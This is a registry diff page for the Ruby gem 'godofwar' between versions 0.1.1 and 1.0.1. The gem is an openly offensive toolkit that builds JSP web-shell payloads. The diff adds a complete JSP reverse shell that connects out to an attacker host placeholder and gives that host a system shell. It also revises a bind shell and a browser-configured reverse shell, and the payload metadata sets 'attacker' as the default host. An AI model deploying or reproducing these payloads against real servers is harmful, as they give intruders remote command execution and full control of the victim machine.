RubyGems - godofwar - Versions diffs - 0.1.1 → 1.0.1 - Mend

godofwar 0.1.1 → 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (9) hide show

checksums.yaml +4 -4
data/lib/godofwar/builder.rb +1 -1
data/lib/godofwar/extensions.rb +21 -21
data/lib/godofwar/version.rb +1 -1
data/payloads/bind_shell/bind_shell.jsp +6 -6
data/payloads/payloads_info.json +9 -2
data/payloads/reverse_shell/reverse_shell.jsp +58 -0
data/payloads/reverse_shell_ui/reverse_shell_ui.jsp +15 -8
metadata +2 -1

checksums.yaml CHANGED Viewed

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: cad770ac51b330105ebdebed6020e46fe9389e1a5b7585921b7541c34178b0b0
-  data.tar.gz: 99bd5b547ce8c0f1cd9c3363aa503d3243f32e6d94ae15933163f35b07b71bee
+  metadata.gz: 02a2315d93cc609cc8995e7c53ed79e27eb19786371d99b6604b212e4c2a5d53
+  data.tar.gz: feb713a3b750d8703371a5bacf60a525d5c16d3fe225247e5015fd14e6f8c464
 SHA512:
-  metadata.gz: 9fac4faf7bf2cbd79f2498c858a288e8548aac1d01e14d5fee6b799c5930216baabe4e2d96ca6aaa1d58cc6a230d29635ae8964b399f4c3c8247f552f07df53c
-  data.tar.gz: 13dc0ed6aadb81cafe8c211e288f312339bc164a5ffafbf716a6d1a9da83ec57550f3c256153b1390a2a739684927a304c2c23ff6ad06590f40d5964c5244b6b
+  metadata.gz: 35891b78552023889a009222df08c8712a99516c2c72581722d8d1e1add71f5e6a45e2cf777afd102e8c05cbe291af13b30b7c2a8591ecf8f8833dc4267258a2
+  data.tar.gz: 65fd0d1a175fb71a253c600b68db5a6877275bd733e72ac2931b31c7aa04039e98bec79032183c5e54437d9b550fc29b6520a034e2bf6ad49c9a46827e9cec1c

data/lib/godofwar/builder.rb CHANGED Viewed

@@ -88,7 +88,7 @@ module GodOfWar
         payload_raw = File.read(payload_file)
       else
         host = host.nil? ? @payload.conf["host"] : host
-        port = port.nil? ? @payload.conf["host"] : port
+        port = port.nil? ? @payload.conf["port"] : port
         payload_raw = File.read(payload_file)
                           .sub('HOSTHOST', "#{host}").sub('PORTPORT', "#{port}")
       end

data/lib/godofwar/extensions.rb CHANGED Viewed

@@ -2,27 +2,27 @@ module GodOfWar
   module Extensions
     module Core
       module String
-        def red;          colorize(self, "\e[1m\e[31m");                 end
-        def green;        colorize(self, "\e[1m\e[32m");                 end
-        def dark_green;   colorize(self, "\e[32m");                      end
-        def yellow;       colorize(self, "\e[1m\e[33m");                 end
-        def blue;         colorize(self, "\e[1m\e[34m");                 end
-        def dark_blue;    colorize(self, "\e[34m");                      end
-        def purple;       colorize(self, "\e[35m");                      end
-        def dark_purple;  colorize(self, "\e[1;35m");                    end
-        def cyan;         colorize(self, "\e[1;36m");                    end
-        def dark_cyan;    colorize(self, "\e[36m");                      end
-        def pure;         colorize(self, "\e[0m\e[28m");                 end
-        def underline;    colorize(self, "\e[4m");                       end
-        def bold;         colorize(self, "\e[1m");                       end
-        def tell;         colorize(self, "[" + " ℹ " + "] ");       end
-        def error;        colorize(self, "[" + " ✖ ".red + "] ");        end
-        def warn;         colorize(self, "[" + " ! ".bold.yellow + "] ");     end
-        def success;      colorize(self, "[" + " ✔ ".dark_green + "] "); end
-        def step_success; colorize(self, "  ✔ ".dark_green);            end
-        def step_fail;    colorize(self, "  ✖ ".dark_green);            end
-        def done;         colorize(self, "[" + " ✔ ".green + "] ");      end
-        def colorize(text, color_code) "#{color_code}#{text}\e[0m"       end
+        def red;          colorize(self, "\e[1m\e[31m");                  end
+        def green;        colorize(self, "\e[1m\e[32m");                  end
+        def dark_green;   colorize(self, "\e[32m");                       end
+        def yellow;       colorize(self, "\e[1m\e[33m");                  end
+        def blue;         colorize(self, "\e[1m\e[34m");                  end
+        def dark_blue;    colorize(self, "\e[34m");                       end
+        def purple;       colorize(self, "\e[35m");                       end
+        def dark_purple;  colorize(self, "\e[1;35m");                     end
+        def cyan;         colorize(self, "\e[1;36m");                     end
+        def dark_cyan;    colorize(self, "\e[36m");                       end
+        def pure;         colorize(self, "\e[0m\e[28m");                  end
+        def underline;    colorize(self, "\e[4m");                        end
+        def bold;         colorize(self, "\e[1m");                        end
+        def tell;         colorize(self, "[" + " ℹ " + "] ");             end
+        def error;        colorize(self, "[" + " ✖ ".red + "] ");         end
+        def warn;         colorize(self, "[" + " ! ".bold.yellow + "] "); end
+        def success;      colorize(self, "[" + " ✔ ".dark_green + "] ");  end
+        def step_success; colorize(self, "  ✔ ".dark_green);              end
+        def step_fail;    colorize(self, "  ✖ ".dark_green);              end
+        def done;         colorize(self, "[" + " ✔ ".green + "] ");       end
+        def colorize(text, color_code) "#{color_code}#{text}\e[0m"        end
       end
     end
   end

data/lib/godofwar/version.rb CHANGED Viewed

@@ -1,3 +1,3 @@
 module GodOfWar
-  VERSION = "0.1.1"
+  VERSION = "1.0.1"
 end

data/payloads/bind_shell/bind_shell.jsp CHANGED Viewed

@@ -44,13 +44,13 @@
   try
   {
     String ShellPath;
-if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
-  ShellPath = new String("/bin/sh");
-} else {
-  ShellPath = new String("cmd.exe");
-}
+    if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
+        ShellPath = new String("/bin/sh");
+    } else {
+        ShellPath = new String("cmd.exe");
+    }
-    ServerSocket server_socket = new ServerSocket( "PORTPORT" );
+    ServerSocket server_socket = new ServerSocket( PORTPORT );
     Socket client_socket = server_socket.accept();
     server_socket.close();
     Process process = Runtime.getRuntime().exec( ShellPath );

data/payloads/payloads_info.json CHANGED Viewed

@@ -21,10 +21,17 @@
     "ref"   : ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
   },
   "reverse_shell_ui": {
-    "desc"  : "TCP reverse shell with a UI to set LHOST and LPORT from browser.",
-    "os"    : "windows",
+    "desc"  : "TCP reverse shell with a HTML form to set LHOST and LPORT from browser.",
+    "os"    : "any",
     "conf"  : {"host": "attacker", "port": 4444},
     "url"   : "http://host/reverse_shell_ui.jsp",
     "ref"   : []
+  },
+  "reverse_shell": {
+    "desc"  : "TCP reverse shell. LHOST and LPORT are hardcoded",
+    "os"    : "any",
+    "conf"  : {"host": "attacker", "port": 4444},
+    "url"   : "http://host/reverse_shell.jsp",
+    "ref"   : []
   }
 }

data/payloads/reverse_shell/reverse_shell.jsp ADDED Viewed

@@ -0,0 +1,58 @@
+<%@page import="java.lang.*"%>
+<%@page import="java.util.*"%>
+<%@page import="java.io.*"%>
+<%@page import="java.net.*"%>
+<%
+  class StreamConnector extends Thread
+  {
+    InputStream xr;
+    OutputStream zf;
+    StreamConnector( InputStream xr, OutputStream zf )
+    {
+      this.xr = xr;
+      this.zf = zf;
+    }
+    public void run()
+    {
+      BufferedReader ye  = null;
+      BufferedWriter gfu = null;
+      try
+      {
+        ye  = new BufferedReader( new InputStreamReader( this.xr ) );
+        gfu = new BufferedWriter( new OutputStreamWriter( this.zf ) );
+        char buffer[] = new char[8192];
+        int length;
+        while( ( length = ye.read( buffer, 0, buffer.length ) ) > 0 )
+        {
+          gfu.write( buffer, 0, length );
+          gfu.flush();
+        }
+      } catch( Exception e ){}
+      try
+      {
+        if( ye != null )
+          ye.close();
+        if( gfu != null )
+          gfu.close();
+      } catch( Exception e ){}
+    }
+  }
+  try
+  {
+    String ShellPath;
+if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
+  ShellPath = new String("/bin/sh");
+} else {
+  ShellPath = new String("cmd.exe");
+}
+    Socket socket = new Socket( "HOSTHOST", PORTPORT );
+    Process process = Runtime.getRuntime().exec( ShellPath );
+    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
+    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
+  } catch( Exception e ) {}
+%>

data/payloads/reverse_shell_ui/reverse_shell_ui.jsp CHANGED Viewed

@@ -4,8 +4,8 @@
 <%@page import="java.net.*"%>
 <form method="post">
-LHOST: <input type="text" name="ip"   size=12 value="HOSTHOST"><br />
-LPORT: <input type="text" name="port" size=12 value="PORTPORT"><br />
+LHOST: <input type="text" name="ip"   size=12 placeholder="HOSTHOST"><br />
+LPORT: <input type="text" name="port" size=12 placeholder="PORTPORT"><br />
 <input type="submit" name="Connect" value="Connect"><br />
 </form>
@@ -52,12 +52,19 @@ try
         }
     }
-    try
-    {
-      Socket socket = new Socket( ipAddress,(new Integer(ipPort)).intValue());
-        Process process = Runtime.getRuntime().exec( "cmd.exe" );
+      try
+      {
+        String ShellPath;
+    if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
+      ShellPath = new String("/bin/sh");
+    } else {
+      ShellPath = new String("cmd.exe");
+    }
+        Socket socket = new Socket( ipAddress,(new Integer(ipPort)).intValue());
+        Process process = Runtime.getRuntime().exec( ShellPath );
         ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
         ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
-    } catch( Exception e ) {}
+      } catch( Exception e ) {}
 }
-%>
+%>

metadata CHANGED Viewed

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: godofwar
 version: !ruby/object:Gem::Version
-  version: 0.1.1
+  version: 1.0.1
 platform: ruby
 authors:
 - KINGSABRI
@@ -50,6 +50,7 @@ files:
 - payloads/filebrowser/example-css.css
 - payloads/filebrowser/filebrowser.jsp
 - payloads/payloads_info.json
+- payloads/reverse_shell/reverse_shell.jsp
 - payloads/reverse_shell_ui/reverse_shell_ui.jsp
 homepage: https://github.com/KINGSABRI/godofwar
 licenses: